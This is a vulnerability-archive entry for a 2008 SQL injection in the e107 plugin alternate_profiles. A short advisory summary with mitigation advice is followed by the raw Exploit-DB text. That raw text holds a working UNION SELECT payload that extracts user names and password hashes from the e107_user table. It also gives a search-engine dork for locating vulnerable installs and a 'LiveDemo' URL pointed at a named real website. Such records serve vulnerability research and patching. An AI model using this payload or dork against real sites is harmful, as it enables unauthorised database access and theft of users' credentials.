e107 Plugin alternate_profiles (newuser.php?id) Remote SQL-injetion Vulnerability

vendor:

alternate_profiles

by:

boom3rang

CVSS

HIGH

Remote SQL-injection

CWE

Product Name: alternate_profiles

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: e107:alternate_profiles

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

e107 Plugin alternate_profiles (newuser.php?id) Remote SQL-injetion Vulnerability

A remote SQL-injection vulnerability exists in the e107 Plugin alternate_profiles (newuser.php?id). An attacker can exploit this vulnerability to gain access to the database and execute arbitrary SQL commands. The vulnerability is due to insufficient sanitization of user-supplied input to the 'id' parameter. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable application. Successful exploitation of this vulnerability can result in unauthorized access to sensitive information, modification of data, and other malicious activities.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to apply the patch as soon as possible.

Source

Exploit-DB raw data:

#############################################################
e107 Plugin alternate_profiles (newuser.php?id) Remote SQL-injetion Vulnerability
#############################################################
[~] Author boom3rang
--------------------------------
[~] Site www.khg-crew.ws
--------------------------------
[~] Greetz KHG & H!tm@N & chs & redc00de & proxy-ki11er  & Hurley
--------------------------------
[!] Script Name: E107
[!] Plugin Vuln: alternate_profiles/newuser.php?id=
[!] Dork:  inurl:"/alternate_profiles/
#############################################################

---------------------------------------------------------------------------------------------------
[-] POC:
http://localhost/e107_plugins/alternate_profiles/newuser.php?id=[exploit]
---------------------------------------------------------------------------------------------------
[-] Exploit:
-9999+union+all+select+1,concat(user_name,char(58),user_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+e107_user/*
---------------------------------------------------------------------------------------------------
[-] LiveDemo:
http://briefcaseit.com/e107_plugins/alternate_profiles/newuser.php?id=-9999+union+all+select+1,concat(user_name,char(58),user_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+e107_user/*
---------------------------------------------------------------------------------------------------
#########################################
- United States of Albania
- Proud to be Albanian
- Proud to be Muslim
#########################################

# milw0rm.com [2008-10-27]